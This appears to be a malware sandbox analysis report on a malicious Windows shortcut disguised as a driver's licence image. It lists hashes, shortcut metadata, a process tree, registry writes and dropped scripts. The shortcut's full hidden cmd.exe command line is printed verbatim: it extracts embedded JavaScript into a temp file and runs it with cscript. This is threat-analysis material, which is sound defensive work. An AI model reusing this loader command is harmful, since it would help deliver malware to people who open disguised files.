| Field | Value |
|---|---|
| File name | Driv License Front.jpg.lnk |
| Full analysis | https://app.any.run/tasks/dfb2bac9-16a6-43f7-898c-85a2878d26ba |
| Verdict | Malicious activity |
| Analysis date | February 21, 2020, 16:42:38 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators | |
| MIME | application/octet-stream |
| File info | MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=2, Archive, ctime=Tue Feb 13 05:29:00 2018, mtime=Tue Feb 13 05:29:00 2018, atime=Tue Feb 13 05:29:00 2018, length=345088, window=hidenormalshowminimized |
| MD5 | EB4827EA9184AFA13229E023C5F7148E |
| SHA1 | 7555DCA670F25E977A250F1B5E1F49A1FE933750 |
| SHA256 | BA7EF37927323C30C09A35D97625B85F20CC504A39C7D3886859762E1C26E111 |
| SSDEEP | 12288:nCrbIGrJnGcAZETsGb4VTbZXJbhmRMBjmE0qYf3YRHmWXQsA:nCrbzZGcASsGb4Vx5AYQuH70 |
| Extension | Identification |
|---|---|
| .lnk | Windows Shortcut (100) |

| Field | Value |
|---|---|
| Flags | IDList, RelativePath, CommandArgs, IconFile, Unicode, NoLinkInfo, ExpIcon, [16], TargetMetadata |
| FileAttributes | Archive |
| CreateDate | 2018:02:13 07:29:00+01:00 |
| AccessDate | 2018:02:13 07:29:00+01:00 |
| ModifyDate | 2018:02:13 07:29:00+01:00 |
| TargetFileSize | 345088 |
| IconIndex | 2 |
| RunWindow | Show Minimized No Activate |
| HotKey | (none) |
| TargetFileDOSName | - |
| RelativePath | `..\..\..\..\..\..\Windows\System32\cmd.exe` |
| CommandLineArguments | `/c path=%windir%\system32&&move "Driv License Front.jpg.lnk " "%tmp%\1.lnk"&forfiles /P "%tmp%" /M "Driv*.lnk" /S /D 0 /C "%comspec% /c move @path %tmp%\1.lnk"&type "%tmp%\1.lnk"\|find "TRU4">"%tmp%\0.js"\|rd a\|\|cSCripT "%tmp%\0.js"` |
| IconFileName | `C:\Program Files\Windows NT\Accessories\wordpad.exe` |
| MachineID | admin-pc |
| FillAttributes | 0x07 |
| PopupFillAttributes | 0xf5 |
| ScreenBufferSize | 1 x 1 |
| WindowSize | 1 x 1 |
| WindowOrigin | 65532 x 65532 |
| FontSize | 8 x 12 |
| FontFamily | Modern |
| FontWeight | 400 |
| FontName | Terminal |
| CursorSize | 25 |
| FullScreen | No |
| QuickEdit | No |
| InsertMode | Yes |
| WindowOriginAuto | No |
| HistoryBufferSize | 50 |
| NumHistoryBuffers | 4 |
| RemoveHistoryDuplicates | No |
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 3976 | `"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Driv License Front.jpg.lnk " "C:\Users\admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\admin\AppData\Local\Temp" /M "Driv*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\admin\AppData\Local\Temp\1.lnk"&type "C:\Users\admin\AppData\Local\Temp\1.lnk"\|find "TRU4">"C:\Users\admin\AppData\Local\Temp\0.js"\|rd a\|\|cSCripT "C:\Users\admin\AppData\Local\Temp\0.js"` | `C:\Windows\System32\cmd.exe` | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 2656 | `forfiles /P "C:\Users\admin\AppData\Local\Temp" /M "Driv*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\admin\AppData\Local\Temp\1.lnk"` | `C:\Windows\system32\forfiles.exe` | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: ForFiles - Executes a command on selected files; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 4056 | `C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\admin\AppData\Local\Temp\1.lnk""` | `C:\Windows\system32\cmd.exe` | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 3376 | `find "TRU4"` | `C:\Windows\system32\find.exe` | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Find String (grep) Utility; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 2548 | `C:\Windows\system32\cmd.exe /S /D /c" rd a"` | `C:\Windows\system32\cmd.exe` | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 2; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 272 | `cSCripT "C:\Users\admin\AppData\Local\Temp\0.js"` | `C:\Windows\system32\cscript.exe` | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Console Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
| 2464 | `C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}` | `C:\Windows\system32\DllHost.exe` | — | svchost.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: COM Surrogate; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 2556 | `"C:\Windows\System32\cscript.exe" C:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.js` | `C:\Windows\System32\cscript.exe` | — | cscript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Console Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
| 4020 | `"C:\Windows\System32\cscript.exe" C:\Users\admin\AppData\Local\Temp\reportapi.js` | `C:\Windows\System32\cscript.exe` | — | cscript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Console Based Script Host; Version: 5.8.7600.16385 |
| PID | Process | Operation | Key | Name | Value |
|---|---|---|---|---|---|
| 272 | cscript.exe | write | `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached` | `{FFE2A43C-56B9-4BF5-9A79-CC6D4285608A} {00000122-0000-0000-C000-000000000046} 0xFFFF` | 01000000000000009452AEF7D5E8D501 |
| 272 | cscript.exe | write | `HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication` | Name | cscript.exe |
| 2464 | DllHost.exe | write | `HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication` | Name | DllHost.exe |
| 272 | cscript.exe | write | `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap` | UNCAsIntranet | 0 |
| 272 | cscript.exe | write | `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap` | AutoDetect | 1 |
| 2556 | cscript.exe | write | `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap` | UNCAsIntranet | 0 |
| 2556 | cscript.exe | write | `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap` | AutoDetect | 1 |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 272 | cscript.exe | `C:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.js` | text | C881308B66759F4A3DCCC1D2F1A741C0 | A28445BE606336C46569D26AA34FD373960B3AF437FB84F68382E2A1BE386A3B |
| 3376 | find.exe | `C:\Users\admin\AppData\Local\Temp\0.js` | text | C881308B66759F4A3DCCC1D2F1A741C0 | A28445BE606336C46569D26AA34FD373960B3AF437FB84F68382E2A1BE386A3B |
| 2556 | cscript.exe | `C:\Users\admin\AppData\Local\Temp\reportapi.js` | text | C881308B66759F4A3DCCC1D2F1A741C0 | A28445BE606336C46569D26AA34FD373960B3AF437FB84F68382E2A1BE386A3B |
| 272 | cscript.exe | `C:\Users\admin\AppData\Local\Temp\Driv License Front.jpg` | image | 8C23A1186E4ABAFE934832C7C581067C | 47512C1B6FF5144C15FC8473CD24994EFB74EEA9AB0387CB3BCB6B726D683773 |
| 3976 | cmd.exe | `C:\Users\admin\AppData\Local\Temp\1.lnk` | lnk | EB4827EA9184AFA13229E023C5F7148E | BA7EF37927323C30C09A35D97625B85F20CC504A39C7D3886859762E1C26E111 |